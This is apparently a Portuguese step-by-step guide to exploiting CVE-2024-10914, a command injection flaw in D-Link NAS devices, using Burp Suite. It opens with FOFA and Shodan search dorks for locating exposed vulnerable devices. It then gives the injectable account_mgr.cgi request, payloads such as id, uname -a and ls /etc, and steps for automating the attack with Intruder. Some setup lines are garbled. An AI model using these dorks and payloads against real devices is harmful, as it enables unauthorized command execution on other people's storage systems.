
CVE-2024-10914_Teste manual com burpsuite
Use o seguinte dork de pesquisa para encontrar dispositivos D-Link NAS potencialmente vulneráveis:
FOFA:
app="D_Link-DNS-ShareCenter" && server=="lighttpd/1.4.25-devel-fb150ff"
SHODAN:
"http.title:D-Link" product:"lighttpd"
Essa string de pesquisa ajuda a identificar dispositivos que executam o aplicativo vulnerável D-Link DNS ShareCenter com a versão específica do servidor Lighttpd afetada pela vulnerabilidade.
Este guia fornece instruções passo a passo sobre como testar manualmente uma Vulnerabilidade de Injeção de Comandos (CVE-2024-10914) no parâmetro name do D-Link NAS usando o Burp Suite. URL alvo: http://Target.
127.0.0.1:8080)127.0.0.1 na porta 8080.http://Target.Localize o parâmetro vulnerável: Na solicitação interceptada, encontre o parâmetro name na URL. Ele deve aparecer como:
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;...;%27
Injete um comando de teste: Modifique o parâmetro name para incluir um comando de teste como echo "test":
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;echo%20%22test%22;%27
Envie a solicitação modificada: Encaminhe a solicitação modificada para o servidor.
Verifique a resposta: Procure pela saída do comando injetado na resposta. Por exemplo, se o servidor executou echo "test", você deve ver:
test
Injete um comando malicioso: Se o teste for bem-sucedido, tente comandos mais sofisticados, como:
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27
Envie a solicitação de exploração: Encaminhe essa solicitação para o servidor.
Analise a resposta: Verifique se a saída do comando (por exemplo, informações de ID do usuário) está presente na resposta.
Use o Intruder: Automatize os testes com a ferramenta Intruder do Burp Suite.
name como a posição do payload.Exemplos de Payloads:
echo "test"
id
uname -a
ls /etc
Inicie o Intruder: Execute o ataque do Intruder para testar vários payloads automaticamente.